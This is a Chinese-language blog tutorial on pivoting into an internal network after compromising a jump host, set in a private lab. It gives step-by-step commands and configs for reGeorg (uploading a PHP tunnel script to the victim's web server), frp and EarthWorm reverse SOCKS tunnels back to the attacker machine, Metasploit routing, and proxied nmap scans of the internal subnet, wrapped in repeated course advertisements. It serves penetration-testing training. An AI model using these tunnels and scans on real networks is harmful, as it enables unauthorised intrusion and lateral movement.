内网穿透 | 一文让你熟练运用内网穿透(步骤详细),网络安全零基础入门到实战案例教程!

前言

内网穿透一直是后渗透的重点,网上这方面的文章很多,吸收总结,花了2天时间整理一份内网穿透的工具应用,力争用最简洁的步骤手把手熟练运用内网穿透。

这里选用常用的4种方式:reGeorge、frp、ew、msf+proxychains(对于不同的内网环境足够用了),其中frp和ew分别再Linux和Win两种环境做了实验

  • 实验环境

  • 两层网络环境可以自己搭建,

攻击机2台(kali 和 win10)192.168.211.164(VMnet8 NAT模式),
192.168.211.193(VMnet8 NAT模式)

跳板机1台(win7):
外网 192.168.211.224 (VMnet8 NAT模式) ,
内网 192.168.52.143(VMnet1仅主机模式)

内网机2台:``192.168.52.138(VMnet1仅主机模式)192.168.52.141(VMnet1仅主机模式)

简单的网络拓扑图如下:

朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

reGeorge

1.1 环境

攻击机kali

reGeorge软件,下载:https://github.com/sensepost/reGeorg

运行序偶需要的环境:

Python、pip、urllib3;

pip安装:

wget https://bootstrap.pypa.io/get-pip.pypython get-pip.py

依赖urllib3安装:

pip install urllib3

1.2 部署配置

上传tunnel.nosocket.php

前提条件,已获得跳板机的权限(都打到内网了,跳板机的权限肯定获得了),Windows7系统的跳板机是php环境,将reGeorge中的tunnel.nosocket.php上传至网站,并访问http://192.168.211.224/tunnel.nosocket.php访问成功

启动reGeorg

python reGeorgSocksProxy.py -p 1080 -uhttp://192.168.211.224/tunnel.nosocket.php #表示本地1080端口的流量都转发给指定的那个url,1080是指定的监听端口;

配置代理

然后配置proxychains代理链的配置文件/etc/proxychains.conf,将代理设置成本机的1080端口:socks5 127.0.0.1 1080

1.3 测试

命令前面加上proxychains 运行命令,(跳板机php环境已启动,存在主页index.php)

proxychainscurl http://192.168.52.143

reGeorg控制端

证明反向代理连接成功

frp

软件:frp_0.33.0_windows_amd64 ,frp_0.34.1_linux_amd64

代理工具Proxifier(windows下通常用可视化的proxifier、SocksCap64,Linux在proxychains设置)

朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~


2.1攻击机为windows环境

frp反向代理:

攻击机-服务端:

设置frps.ini

[common] bind_port = 7000

然后运行

frps.exe -c frps.ini

跳板机-客户端:

设置frpc.ini

[common]
server_addr = 192.168.211.193
server_port = 7000

[http_proxy]
type = tcp
remote_port = 8010
plugin=socks5

然后运行

frpc.exe -c frpc.ini

服务器端运行proxifier监听8010端口:

点击检查

proxifier里测试成功。

浏览器访问192.168.52.143 访问成功

测试远程,远程连接192.168.52.143、141(此两台机器远程连接均已开)

frp正向代理:

攻击机为客户端 frpc.ini

[common]
server_addr = 192.168.211.224
server_port = 7000

[http_proxy]
type = tcp
remote_port = 8010 plugin=socks5

执行

frpc.e -c frpc.ini

跳板机为服务器端

[common] bind_port = 7000

执行

frps.exe -c frps.ini

在攻击机-客户端上运行proxifier,添加服务器的地址192.168.211.214,端口8010,进行连接

不知道啥原因,连接跳板机内网192.168.52.143未成功,连接跳板外网卡192.168.211.214成功,

网上也搜索了大量frp 正向代理,貌似用frp做正向代理的不多,推出以后frp还是坚持用反向代理吧。


2.2 攻击机为 kali环境

frp反向代理

服务器端-攻击机:

frps.ini 配置内容

[common] bind_port = 7000

执行命令

./frps -c frps.ini

客户端-跳板机:

frpc.ini配置内容

[common]
server_addr = 192.168.211.193
server_port = 7000

[http_proxy] 
type = tcp    
#remote_port = 8010    
remote_port =1080   
plugin=socks5

执行命令

frpc.exe -c frpc.ini

配置proxychains代理链

配置文件/etc/proxychains.conf,

将代理设置成本机的1080端口(root用户修改):

socks4 127.0.0.1 1080

然后命令前面加上proxychains即可。

测试:

proxychains curl http://192.168.52.143

proxychains rdesktop 192.168.52.141 (远程连接内网电脑桌面)

证明代理成功。

执行nmap

proxychains nsap -p 1-1000 -Pn -sT192.168.52.141

扫描C端存活机器和端口

roxychains nmap -p 1-65525 -Pn -sT192.168.52.0/24

总结frp优缺点

优点:使用反向代理,只需要把需要访问的内网主机和端口转发出来即可,速度较快

缺点:访问https网站时配置相对复杂

朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~


3.1 攻击机为windos10环境

ew正向代理

1.正向连接跳板机在win7机器上执行(ew_for_windows上传到跳板机)

ew_for_Win.exe -s ssocksd -l 888

攻击机-监听本机888端口。然后在win10机器上proxifier进行连接

测试http: 访问 http://192.168.52.143/成功

测试远程桌面:192.168.52.141 成功

ew反向代理

攻击机器上执行

ew_for_Win.exe -s rcsocks -l 1080 -e 1234

对外1234端口转发到1080端口,

-l 本地监听端口,待会连接这个端口作为 socks5 端口

-e 反弹中转端口

然后边缘机器连接

ew_for_Win.exe -s rssocks -d192.168.211.164 -e 1234

-d 指定反弹的主机,这里为公网 vps 的 ip

-e 指定反弹中转端口,和vps中的设置的一样

测试http: 访问 http://192.168.52.143/成功

测试远程桌面:192.168.52.141 成功

朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~


3.2 攻击机环境为kali

ew反向代理

服务端-攻击机kali

执行:

./ew_for_linux64 -s rcsocks -l 1080 -e 1024

客户端-跳板机

执行

ew_for_Win.exe -s rssocks -d192.168.211.193 -e 1024

配置proxychains代理链

在配置文件/etc/proxychains.conf,

将代理设置成本机的1080端口(root用户修改):

测试执行:

执行curlhttp://192.168.211.219/index.php 证明网络是通

执行

proxychainscurl http://192.168.52.143/index.php

证明代理成功

连接成功。

执行namp

proxychains nmap -p 1-1000 -Pn -sT192.168.52.141

ew正向代理

服务器端-跳板机

执行命令:

ew_for_Win.exe -s ssocksd -l 1080

客户端-攻击机kali

配置proxychains代理链

在配置文件/etc/proxychains.conf,

将代理设置成服务器的IP和1080端口(root用户修改):

测试执行:

执行

proxychains curl http://192.168.211.219/index.php

证明代理成功

下面几步均是测试代理条件下 nmap的运用

执行nmap扫描内网存活主机

proxychains map -PS 192.168.211.1/24

注意:在常规无代理的情况下扫描会很快

加入代理后扫描的较慢

无ping 扫描

proxychains nmap -p0 192.168.52.1/24

扫描存活主机开放端口

proxychains nmap -p 1-1000 -Pn -sT192.168.52.141

总结优缺点

优点:配置简单,相当于直接处于目标内网

缺点:速度较慢,不稳定

msf+proxychains

msf获得跳板机的权限(如何获得这里就不多叙述了,使用msf自带模块攻击),

(1)添加内网路由

添加路由的目的是为了让MSF其他模块能访问内网的其他主机,即52网段的攻击流量都通过已渗透的这台目标主机的meterpreter会话来传递;

(注:添加路由一定要在挂代理之前,因为代理需要用到路由功能)

使用arp -a 查看一下所有接口的当前ARP缓存

(2)添加socks代理,

添加socks4a代理的目的是为了让其他软件更方便的访问到内网的其他主机的服务;设置成功后打开其他程序时都要在前面加上proxychains。

通过reGeorge+socks4的方式(步骤详见本文00x1)添加代理

证明代理成功

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述
在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
在这里插入图片描述
在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:
在这里插入图片描述
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值